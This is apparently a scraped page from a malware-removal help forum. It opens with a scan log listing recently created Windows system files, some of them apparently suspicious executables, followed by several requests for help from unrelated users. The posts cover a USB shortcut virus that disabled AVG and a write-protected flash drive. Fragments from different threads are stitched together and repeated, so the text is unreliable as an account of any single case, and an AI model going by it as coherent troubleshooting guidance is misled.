2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:08:39 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-16 06:23:39 0 ----a-w- C:\Windows\SysWow64\shoD5D8.tmp
2015-05-14 07:03:15 7680 ----a-w- C:\Windows\wnavga.exe
2015-05-14 07:03:15 7680 ----a-w- C:\Windows\cfsvc.exe
2015-05-13 21:11:36 922704 ----a-w- C:\Windows\System32\drivers\VBoxDrv.sys
2015-05-13 21:10:24 141440 ----a-w- C:\Windows\System32\drivers\VBoxNetAdp.sys
2015-05-13 21:10:24 128592 ----a-w- C:\Windows\System32\drivers\VBoxUSBMon.sys
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-25 09:18:36 53248 ----a-w- C:\Windows\zlib.dll
2015-04-25 09:18:36 295424 ----a-w- C:\Windows\System32\ysxja.exe
2015-04-25 09:18:36 295424 ----a-w- C:\Windows\cygavb.exe
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
.
============= FINISH: 22:04:20.64 ===============

Attach:
Attachment 243402

I do not have a windows install disc nor boot CD.

Attached Files

attach.txt (17.1 KB)

He is the requested info, I do have the install disc.

Attached Files

	attach.txt (10.3 KB)
	dds.txt (4.2 KB)

the problem started after i was taking some files from a teacher via my pendrive..
the contents were made shortcut by a virus..
i knew it was a virus but i still double clicked it and it popped out some error...
after that i right clicked on the SHORTCUT and clicked SCAN WITH AVG
and i could no longer see avg running anywhere..
i tried to run avg from its installed directory with administrator rights but it says "windows cannot access the specified path, device or file."
i can neither uninstall AVG nor Repair,,.. help

He is the requested info, I do have the install disc.

Attached Files

	attach.txt (10.3 KB)
	dds.txt (4.2 KB)

help i need to format my usb but i think it is infected with the write protection virus here is the link for my scan Report ⋆ UsbFix

I was instructed to come here from another thread (Double Boot).

Originally Posted by Corday View Post
I was going to say, run MSE, but I think that you should read this article.
NEW INSTRUCTIONS - Read This Before Posting For Malware Removal Help
follow the instructions very carefully; then, post all the requested logs and information; as instructed, in the Virus/Trojan/Spyware Help section of the forum.
(Simply, click on the colored links to be re-directed.)

Please ensure that you create a new thread in the Virus/Trojan/Spyware HelpForum; not back here in this one.

When carrying out The Malware Removal Steps, if you cannot complete any of them for whatever reason, just continue on with the next one until they are all completed.
However,it is extremely important to make mention of the fact that you could not complete any of the steps in your post to the Virus/Trojan/Spyware Help Forum; where an Analyst will assist you with other workarounds.

Once done, please be patient, as the Security Team Analysts are usually very busy; one of them will answer your request as soon as they can.

I am ready to start the process and am standing by.

Thanks in advance.

RA